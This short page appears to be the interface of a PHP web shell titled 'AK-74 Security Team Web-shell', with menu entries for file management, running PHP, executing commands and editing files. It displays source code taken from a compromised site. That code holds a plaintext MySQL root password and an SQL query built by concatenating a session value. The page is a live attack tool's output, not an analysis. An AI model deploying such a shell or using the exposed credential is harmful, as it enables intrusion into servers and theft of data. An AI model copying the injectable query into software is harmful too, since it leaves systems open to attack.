.:: :[ AK-74 Security Team Web-shell ]: ::.
General information
File manager
phpinfo()
Run PHP
Execute the command
Edit the file
<?php session_start(); include ('../init.php'); include ('../func/fn_common.php'); checkUserSession(); loadLanguage($gsValues['LANGUAGE']); $con = mysqli_connect("localhost", "root", "4c>5:kxUd8YN8,LK", "gs"); $q = "UPDATE `gs_users` SET `user_flag`='0', `admin_flag`='0' WHERE (`username`='" . $_SESSION['username'] . "')"; if(mysqli_query($con, $q)){ echo 1; } else { echo 0; } ?>
Rename:
-